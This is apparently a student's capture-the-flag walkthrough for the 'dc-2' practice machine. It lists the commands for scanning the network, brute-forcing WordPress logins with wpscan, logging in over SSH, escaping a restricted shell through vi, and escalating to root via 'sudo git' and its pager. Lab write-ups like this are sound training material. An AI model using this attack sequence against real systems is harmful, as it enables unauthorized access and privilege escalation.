. # = means commands

. 1-6 = show my steps

1 netdiscover.

# netdiscover -r []

. netdiscover = find network traffic ips and mac address.

. -r = range: scan a given range instead of auto scan.,/16,/8

2 nmap

# nmap -p- [] -sV

. -p- = bydefault all ports scan tcp ex: 65535

. -sV = Probe open ports to determine service/version info

3 wpscan.

# wpscan --url http://dc-2/ -e

. --url = target url scan

. -e = enumerate ex: username.

#wpscan --url http://dc-2/ -U /home/kali/usr -P /home/kali/pass.txt

. -U = usernames LIST

. -P password LIST

3 aceess.

# ssh tom@ -p 7744

. access the tom users on port 7744.

4 change shell for this machine for the root access

# vi flag3.txt and :set shell=/bin/bash after that call the shell

5 To run all linux commands LIKE:- cat , cd , su , sudo etc.

# export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH

. export = this command add use for add variables.

4 how many command run with sudo check.

# sudo -l

5 how to access root.

# sudo git -p help config

. This invokes the default pager, which is likely to be less, other functions may apply.

6 after that you are access the final flag and your work complete.


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